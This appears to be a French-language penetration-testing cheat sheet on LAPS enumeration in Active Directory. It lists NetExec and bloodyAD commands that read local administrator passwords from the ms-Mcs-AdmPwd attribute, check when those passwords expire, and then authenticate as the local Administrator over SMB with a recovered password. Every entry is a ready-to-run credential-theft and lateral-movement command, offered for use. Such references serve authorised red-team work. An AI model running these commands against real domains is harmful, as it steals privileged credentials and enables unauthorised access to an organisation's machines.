Copy command
nxc ldap $DC -u $USER -p $PASS --lapsDescription: Lire les mots de passe LAPS de tous les hosts accessibles via l'ACL courante.
Information Gathering
LAPS Enum
Enumérer et lire les mots de passe LAPS quand l'ACL le permet.
Copy command
nxc ldap $DC -u $USER -p $PASS --laps --computer $COMPUTERDescription: LAPS ciblé sur une machine précise pour limiter le bruit.
Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$COMPUTER$' --attr ms-Mcs-AdmPwdDescription: Lire directement l'attribut LAPS via LDAP si l'ACL le permet.
Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$COMPUTER$' --attr ms-Mcs-AdmPwdExpirationTimeDescription: Vérifier la date d'expiration du mot de passe LAPS pour évaluer sa fraîcheur.
Copy command
nxc smb $TARGET -u Administrator -p '$LAPS_PASS' --local-authDescription: Se connecter avec le mot de passe LAPS en auth locale (Administrator).